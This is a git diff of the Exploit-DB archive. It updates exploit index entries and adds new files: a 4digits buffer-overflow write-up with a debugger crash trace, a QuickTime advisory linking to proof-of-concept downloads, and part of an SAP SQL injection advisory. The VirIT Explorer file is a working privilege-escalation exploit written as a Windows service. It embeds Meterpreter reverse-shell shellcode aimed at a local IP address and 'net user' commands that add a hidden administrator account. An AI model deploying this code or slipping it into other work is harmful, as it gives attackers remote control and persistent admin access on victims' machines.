Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0 -36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900 +36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 / 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900 36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0 @@ -33742,7 +33743,7 @@ id,file,description,date,author,platform,type,port 37395,platforms/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Stored XSS",2015-06-26,"Suraj Krishnaswami",windows,webapps,0 37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-13,Sangteamtham,windows,remote,0 37397,platforms/php/webapps/37397.html,"SPIP 2.x Multiple Cross Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0 -37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 Local File Include and Arbitrary File Upload Vulnerabilities",2012-06-13,KedAns-Dz,php,webapps,0 +37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 - Local File Include / Arbitrary File Upload Vulnerabilities",2012-06-13,KedAns-Dz,php,webapps,0 37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin 'uploadPhotoApres.php' Arbitrary File Upload Vulnerability",2012-01-14,"Sammy FORGIT",php,webapps,0 37400,platforms/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",windows,remote,0 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux 64 bit - Encoded execve shellcode",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 @@ -34054,7 +34055,7 @@ id,file,description,date,author,platform,type,port 37729,platforms/windows/remote/37729.py,"Filezilla Client 2.2.X - SEH Buffer Overflow Exploit",2015-08-07,ly0n,windows,remote,0 37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 -37732,platforms/win32/local/37732.c,"Windows XP SP3 x86 and 2003 SP2 x86 - NDProxy Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0 +37732,platforms/win32/local/37732.c,"Windows XP SP3 x86 / 2003 SP2 x86 - NDProxy Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 37747,platforms/windows/dos/37747.py,"Havij Pro - Crash POC",2015-08-10,i_7e1,windows,dos,0 @@ -34212,7 +34213,7 @@ id,file,description,date,author,platform,type,port 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999 -37889,platforms/linux/remote/37889.txt,"YingZhiPython Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-09-26,"Larry Cashdollar",linux,remote,0 +37889,platforms/linux/remote/37889.txt,"YingZhiPython - Directory Traversal / Arbitrary File Upload Vulnerabilities",2012-09-26,"Larry Cashdollar",linux,remote,0 37890,platforms/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Buffer Overflow",2015-08-20,metacom,windows,local,0 37891,platforms/xml/webapps/37891.txt,"Aruba Mobility Controller 6.4.2.8 - Multiple vulnerabilities",2015-08-20,"Itzik Chen",xml,webapps,4343 37892,platforms/asp/webapps/37892.txt,"Vifi Radio v1 - CSRF Vulnerability",2015-08-20,KnocKout,asp,webapps,80 @@ -34716,7 +34717,7 @@ id,file,description,date,author,platform,type,port 38437,platforms/hardware/remote/38437.txt,"Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 38438,platforms/php/webapps/38438.txt,"EasyPHP 'index.php' Authentication Bypass and Remote PHP Code Injection Vulnerability",2013-04-09,KedAns-Dz,php,webapps,0 38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0 -38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 +38440,platforms/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 - 3.1.4 - DoS",2015-10-11,"Aria Akhavan Rezayat",php,dos,0 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 @@ -35079,7 +35080,7 @@ id,file,description,date,author,platform,type,port 38820,platforms/php/webapps/38820.php,"WordPress This Way Theme 'upload_settings_image.php' Arbitrary File Upload Vulnerability",2013-11-01,Bet0,php,webapps,0 38821,platforms/android/remote/38821.py,"Google Android Signature Verification Security Bypass Vulnerability",2013-11-04,"Jay Freeman",android,remote,0 38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection",2015-11-28,hland,windows,webapps,8080 -38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 and 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 +38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence XML External Entity Information Disclosure Vulnerability",2013-10-11,IBM,multiple,remote,0 38826,platforms/linux/remote/38826.py,"Linux Kernel <= 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure Vulnerability",2013-12-10,"Mathy Vanhoef",linux,remote,0 38827,platforms/php/remote/38827.txt,"Nagios XI 'tfPassword' Parameter SQL Injection Vulnerability",2013-12-13,"Denis Andzakovic",php,remote,0 @@ -35782,7 +35783,7 @@ id,file,description,date,author,platform,type,port 39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent XSS",2016-03-28,"Sarim Kiani",multiple,webapps,80 -39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443 +39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Exploit (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443 39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80 @@ -35810,7 +35811,7 @@ id,file,description,date,author,platform,type,port 39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80 -39621,platforms/php/webapps/39621.txt,"Wordpress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 +39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 39622,platforms/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8/3.7 - CSRF Vulnerabilities",2016-03-27,hyp3rlinx,hardware,webapps,80 39599,platforms/windows/remote/39599.txt,"Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0 @@ -35863,7 +35864,7 @@ id,file,description,date,author,platform,type,port 39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0 -39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 and 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0 +39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0 39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0 39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272 39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0 @@ -35886,7 +35887,7 @@ id,file,description,date,author,platform,type,port 39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0 39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 -39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0/7.0.3 and 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0 +39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0 39688,platforms/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,php,webapps,80 39691,platforms/jsp/webapps/39691.py,"Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass and Arbitrary File Upload Exploit",2016-04-13,"Zhou Yu",jsp,webapps,8088 39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0 @@ -35915,7 +35916,7 @@ id,file,description,date,author,platform,type,port 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (Powershell)",2016-04-21,b33f,windows,local,0 -39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x and 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 +39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39723,platforms/lin_x86/shellcode/39723.c,"Linux x86 Shellcode - Bind TCP Port 1472 (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 @@ -36024,3 +36025,7 @@ id,file,description,date,author,platform,type,port 39836,platforms/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",2016-05-17,metasploit,multiple,remote,0 39837,platforms/java/webapps/39837.txt,"SAP xMII 15.0 - Directory Traversal",2016-05-17,ERPScan,java,webapps,0 39838,platforms/php/webapps/39838.php,"Magento < 2.0.6 - Unauthenticated Arbitrary Unserialize -> Arbitrary Write File",2016-05-18,agix,php,webapps,80 +39840,platforms/xml/webapps/39840.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - SQL Injection",2016-05-19,ERPScan,xml,webapps,0 +39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0 +39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0 +39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0 diff --git a/platforms/linux/dos/39842.txt b/platforms/linux/dos/39842.txt new file mode 100755 index 000000000..b40c618c3 --- /dev/null +++ b/platforms/linux/dos/39842.txt @@ -0,0 +1,140 @@ +4digits 1.1.4 Local Buffer Overflow Privilege Escalation ( if setuid/setgid ) + +Discoverd by N_A , N_A [at] tutanota.com +Downloaded and tested upon Kali Linux + +Vendor has been notified. + + +Description +------------- + +4digits is a guess-the-number puzzle game. It's also called Bulls and Cows, and in China people simply call it Guess-the-Number. The game's objective is to guess a four-digit number in 8 times. + +https://sourceforge.net/projects/fourdigits/ + + +Vulnerability +-------------- + +4digits version 1.1.4 and possibly earlier versions suffer from a buffer overflow vulnerability where possible code execution can occur and privileges can be escalated if this is setuid/setgid. + +The vulnerability is found within the 4digits-text binary version of the game. +An environment variable is not checked thoroughly before it is passed to the function save_score() when a user wins at the game. An attacker may be able to execute arbitary code: + +4digits-text.c: + +/* save current score in the score file */ +void save_score(const int time_taken) { + time_t tm = time(NULL); + struct tm *today = localtime(&tm); + char tmpbuffer[129]; + today = localtime(&tm); + char appdata_dir[4096]; //XXX why _PC_PATH_MAX is only 4? <----- The buffer we over flow + const char *score_filename = "4digits.4digits.scores"; + strcpy(appdata_dir, getenv("HOME")); <------ Collecting "HOME" + strcat(appdata_dir, "/.4digits/"); + char *scorefile = (char*)malloc(strlen(appdata_dir) + strlen(score_filename) + 1); + if(!scorefile) + err_exit(_("Memory allocation error.\n")); + strcpy(scorefile, appdata_dir); <------ Vulnerability here + strcat(scorefile, score_filename); + + +The save_score() function is called when the user successfully wins at the game and this is when the vulnerability becomes active, as per example below: + +First, set the HOME variable as below + +$ export HOME=`perl -e 'print"A"x5100'` + +Then , load the game into GDB ( if you want to debug it in real time ) + +$ gdb 4digits-text +GNU gdb (Debian 7.10-1+b1) 7.10 +Copyright (C) 2015 Free Software Foundation, Inc. +License GPLv3+: GNU GPL version 3 or later +This is free software: you are free to change and redistribute it. +There is NO WARRANTY, to the extent permitted by law. Type "show copying" +and "show warranty" for details. +This GDB was configured as "i586-linux-gnu". +Type "show configuration" for configuration details. +For bug reporting instructions, please see: +. +Find the GDB manual and other documentation resources online at: +. +For help, type "help". +Type "apropos word" to search for commands related to "word"... +Reading symbols from 4digits-text...done. +(gdb) run + + +To activate the bug you must run the game and then win/guess the right number: + + +(gdb) run +Starting program: /home/N/4digits-1.1.4/4digits-text +Input a 4-digit number:1234 +2A0B 7 times left. +Input a 4-digit number:7934 +1A1B 6 times left. +Input a 4-digit number:8235 +3A0B 5 times left. +Input a 4-digit number:8236 +3A0B 4 times left. +Input a 4-digit number:8239 +3A0B 3 times left. +Input a 4-digit number:8237 +4A0B 2 times left. +You win! :) Used 120 sec. + +Program received signal SIGSEGV, Segmentation fault. +__strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S:50 +50 ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S: No such file or directory. + + +(gdb) i r +eax 0x0 0 +ecx 0x1 1 +edx 0x5 5 +ebx 0x13f6 5110 +esp 0xbfffd424 0xbfffd424 +ebp 0xbfffe4f8 0xbfffe4f8 +esi 0x0 0 +edi 0x41414141 1094795585 +eip 0xb7e854b6 0xb7e854b6 <__strlen_sse2_bsf+22> +eflags 0x10287 [ CF PF SF IF RF ] +cs 0x73 115 +ss 0x7b 123 +ds 0x7b 123 +es 0x7b 123 +fs 0x0 0 +gs 0x33 51 + + +(gdb) backtrace +#0 __strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S:50 +#1 0x08048f8f in save_score (time_taken=1094795585) at 4digits-text.c:183 +#2 0x41414141 in ?? () +#3 0x41414141 in ?? () +#4 0x41414141 in ?? () +#5 0x41414141 in ?? () +#6 0x41414141 in ?? () +#7 0x41414141 in ?? () +#8 0x41414141 in ?? () +#9 0x41414141 in ?? () +#10 0x41414141 in ?? () +#11 0x41414141 in ?? () +#12 0x41414141 in ?? () +#13 0x41414141 in ?? () +#14 0x41414141 in ?? () +#15 0x41414141 in ?? () +#16 0x41414141 in ?? () +#17 0x41414141 in ?? () +#18 0x41414141 in ?? () +#19 0x41414141 in ?? () +#20 0x41414141 in ?? () +#21 0x41414141 in ?? () +#22 0x41414141 in ?? () + + +By N_A , N_A [at] tutanota.com \ No newline at end of file diff --git a/platforms/osx/dos/39839.txt b/platforms/osx/dos/39839.txt new file mode 100755 index 000000000..16f1c4c85 --- /dev/null +++ b/platforms/osx/dos/39839.txt @@ -0,0 +1,68 @@ +##################################################################################### + +Application: Apple Quicktime + +Platforms: OSX + +Author: Francis Provencher of COSIG + +Website: http://www.protekresearchlab.com/ + +Twitter: @COSIG_ @protekresearch + +CVE-2016-1848 + +##################################################################################### + +1) Introduction +2) Report Timeline +3) Technical details +4) POC + +##################################################################################### + +=============== +1) Introduction +=============== + +QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer. + +(https://en.wikipedia.org/wiki/QuickTime) + +##################################################################################### + +============================ +2) Report Timeline +============================ + +2016-03-14: Francis Provencher from COSIG report issue to Apple security team; +2016-03-21: Apple security team confirmed this issue; +2016-05-17: Apple fixed this issue; + +https://support.apple.com/en-us/HT206567 +##################################################################################### + +============================ +3) Technical details +============================ + +This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. + +User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. + +The specific flaw exists within the parsing of invalid data in the mdat atom. An attacker can use this flaw to read outside the + +allocated buffer, which could allow for the execution of arbitrary code in the context of the current process. + +##################################################################################### + +=========== + +4) POC + +=========== + +http://protekresearchlab.com/exploits/COSIG-2016-19.mov +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39839.zip + +############################################################################### diff --git a/platforms/php/webapps/12387.sh b/platforms/php/webapps/12387.sh index 66639e86e..6d4ef166b 100755 --- a/platforms/php/webapps/12387.sh +++ b/platforms/php/webapps/12387.sh @@ -1,7 +1,7 @@ # # WebEssence 1.0.2 Multiple Vulnerabilities # -# Bugs found by white_sheep, R00T_ATI and epicfail +# Bugs found by white_sheep, r00t and epicfail # for Debug|Track session @ Backtrack|italia community conference # www.backtrack.it # diff --git a/platforms/php/webapps/12643.pl b/platforms/php/webapps/12643.pl index 2cd55d113..ee8e61dbf 100755 --- a/platforms/php/webapps/12643.pl +++ b/platforms/php/webapps/12643.pl @@ -11,7 +11,7 @@ http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9 # # # Example: -# [simone@simons Advisories]$ hybris chillycms.hy +# [user@user Advisories]$ hybris chillycms.hy # Searching Username... : # admin # Searching MD5... : diff --git a/platforms/php/webapps/17613.php b/platforms/php/webapps/17613.php index 680397f16..72cc9a575 100755 --- a/platforms/php/webapps/17613.php +++ b/platforms/php/webapps/17613.php @@ -22,10 +22,7 @@ FIX: Upgrade to version 3.8.5 Bug found by: IHTeam - Simone `R00T_ATI` Quatrini - Marco `white_sheep` Rondini - Francesco `merlok` Morucci - Mauro `epicfail` Gasperini + For GetShopped as their security auditors This code has been released under the authorization of GetShopped staff. diff --git a/platforms/php/webapps/2087.php b/platforms/php/webapps/2087.php index 9f6337882..0dd7dea22 100755 --- a/platforms/php/webapps/2087.php +++ b/platforms/php/webapps/2087.php @@ -1,7 +1,6 @@ #!/usr/bin/php -q -d short_open_tag=on +#include + +#define small_sleep 5000 +#define big_sleep 180000 + +SERVICE_STATUS ServiceStatus; +SERVICE_STATUS_HANDLE hStatus; + +void ServiceMain(int argc, char **argv); +void ControlHandler(DWORD request); +typedef short (CALLBACK * FuncType) (LPCTSTR); + +/*Meterpreter reverse payload (windows/meterpreter/reverse_tcp), replace with your own*/ +unsigned char r_shell[] = +"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" +"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" +"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" +"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" +"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" +"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" +"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" +"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" +"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" +"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" +"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xc0\xa8\x01\x8a\x68\x02" +"\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea" +"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" +"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00" +"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83" +"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a" +"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57" +"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00" +"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68" +"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff" +"\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00" +"\x53\xff\xd5"; + +int Spawn_Shell(){ + //Spawn the reverse shell + int (*func)(); + func = (int (*)()) r_shell; + (int)(*func)(); +} + +int Add_Admin(){ + //ADD VoidSec:secret to Local Administrators + system("net user VoidSec secret /ADD"); + system("net localgroup Administrators VoidSec /ADD"); return 0; +} + +int main(){ + SERVICE_TABLE_ENTRY ServiceTable[2]; + ServiceTable[0].lpServiceName = "viritsvclite"; + ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION) ServiceMain; + ServiceTable[1].lpServiceName = NULL; + ServiceTable[1].lpServiceProc = NULL; + StartServiceCtrlDispatcher(ServiceTable); + + return 0; +} + +void ServiceMain(int argc, char **argv) { + ServiceStatus.dwServiceType = SERVICE_WIN32; + ServiceStatus.dwCurrentState = SERVICE_START_PENDING; + ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN; + ServiceStatus.dwWin32ExitCode = 0; + ServiceStatus.dwServiceSpecificExitCode = 0; + ServiceStatus.dwCheckPoint = 0; + ServiceStatus.dwWaitHint = 0; + hStatus = RegisterServiceCtrlHandler("viritsvclite", (LPHANDLER_FUNCTION) ControlHandler); + ServiceStatus.dwCurrentState = SERVICE_RUNNING; + SetServiceStatus(hStatus, &ServiceStatus); + + //Big sleep (3m), let Windows start Network, DHCP etc. + Sleep(big_sleep); + + Spawn_Shell(); + //Add_Admin(); + + //Let our service run instead of kill it (only works with Add_Admin, Spawn_Shell will kill it on exit) + /*while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) { + Sleep(small_sleep); + }*/ + + return; +} + +void ControlHandler(DWORD request) { + switch (request) { + case SERVICE_CONTROL_STOP: + ServiceStatus.dwWin32ExitCode = 0; + ServiceStatus.dwCurrentState = SERVICE_STOPPED; + SetServiceStatus(hStatus, &ServiceStatus); + return; + case SERVICE_CONTROL_SHUTDOWN: + ServiceStatus.dwWin32ExitCode = 0; + ServiceStatus.dwCurrentState = SERVICE_STOPPED; + SetServiceStatus(hStatus, &ServiceStatus); + return; + default: + break; + } + SetServiceStatus(hStatus, &ServiceStatus); + + return; +} \ No newline at end of file diff --git a/platforms/xml/webapps/39840.txt b/platforms/xml/webapps/39840.txt new file mode 100755 index 000000000..2da519861 --- /dev/null +++ b/platforms/xml/webapps/39840.txt @@ -0,0 +1,168 @@ +Application: SAP NetWeaver AS JAVA +Versions Affected: SAP NetWeaver AS JAVA 7.1 - 7.5 +Vendor URL: http://SAP.com +Bugs: SQL injection +Send: 04.12.2015 +Reported: 04.12.2015 +Vendor response: 05.12.2015 +Date of Public Advisory: 09.02.2016 +Reference: SAP Security Note 2101079 +Author: Vahagn Vardanyan (ERPScan) + + +Description + +1. ADVISORY INFORMATION + +Title: SAP NetWeaver AS JAVA – SQL injection vulnerability +Advisory ID: [ERPSCAN-16-011] +Risk: Critical +Advisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/ +Date published: 09.02.2016 +Vendors contacted: SAP + + +2. VULNERABILITY INFORMATION + +Class: SQL injection + +Impact: Resource consumption +Remotely Exploitable: Yes +Locally Exploitable: No +CVE: 2016-2386 +CVSS Information +CVSS Base Score v3: 9.1 / 10 +CVSS Base Vector: +AV : Access Vector (Related exploit range) Network (N) +AC : Access Complexity (Required attack complexity) Low (L) +Au : Authentication (Level of authentication needed to exploit) None (N) +C : Impact to Confidentiality High (H) +I : Impact to Integrity High(H) +A : Impact to Availability None (N) + + +3. VULNERABILITY DESCRIPTION + +An SQL injection vulnerability means that a code comprises an SQL +statement that contains strings that can be altered by an attacker. +The manipulated SQL statement can be used to gain additional data from +the database or to modify the information. + + +4. VULNERABLE PACKAGES + +SAP NetWeaver AS JAVA 7.1 - 7.5 + +Other versions are probably affected too, but they were not checked. + + +5. SOLUTIONS AND WORKAROUNDS + +To correct this vulnerability, install SAP Security Note 2101079 + + +6. AUTHOR + +Vahagn Vardanyan (ERPScan) 